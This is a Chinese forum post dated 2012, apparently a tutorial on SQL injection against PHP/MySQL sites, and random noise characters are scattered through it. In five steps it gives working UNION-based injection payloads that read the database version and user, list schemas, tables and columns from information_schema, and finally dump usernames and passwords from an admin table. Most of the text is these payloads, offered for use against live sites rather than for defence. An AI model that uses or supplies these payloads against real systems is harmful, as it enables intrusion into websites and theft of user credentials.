$ c- z' v' `9 R8 c4 w; u
教程内容:Mysql 5+php 注入
/ S. G+ n( O$ J4 ]! F/ |6 L6 T8 p" a
. T! z2 l' Q8 X6 O) C2 ]! I+ k* Q: P8 ?% }9 D, J' \; T
一.查看MYSQL基本信息(库名,版本,用户)! a& k a4 k e4 k/ U! n
5 r# @6 k" H8 K) p$ Z0 c4 k) U1 p
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*5 E" T4 Y0 j9 [5 ~! ~7 R. x
$ b6 z r m8 N$ I, T二.查数据库
8 o$ w1 q, a% J
0 S. F: u4 {6 E2 b6 eand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
& k/ C1 f' V+ X4 llimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。' {3 V P; }+ H" ^
* I9 J$ \/ B3 n: U6 ?
三.暴表
4 D I# Q/ y0 P: F/ A4 X1 Y1 r% u+ B, d1 S8 \3 {" D
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*$ O. M5 W& R' |) T' b
7 @# o$ M# t) e8 x) E$ |
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
# X- t% d0 l6 j0 R0 j
" Y- |& ~) ~( L1 Y( e# w2 Y8 T( _1 m四.暴字段- y4 b4 e: Z! F$ o) [6 C) ]
5 d% @% g) g) z, O. [, |3 y8 _
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
" n6 J7 Q- l9 E. r* P; m& V
+ U6 R1 P( {: S9 tlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
# d$ U. x8 r# Z9 F t# A9 @
$ T7 z/ n2 y9 J( N8 B1 p五.暴数据
2 F1 F" d/ ?0 d' z- y f( d% t0 o( W
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
: i% b& @& K2 x" l0 j
2 u8 @4 ^5 U! ~8 J4 e2 |8 k* L: k* L1 {7 y6 L; y, s
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
4 F. |5 @% x, Q- `9 X) M I/ X |
发表于 2012-9-13 16:27:53
收藏
支持
反对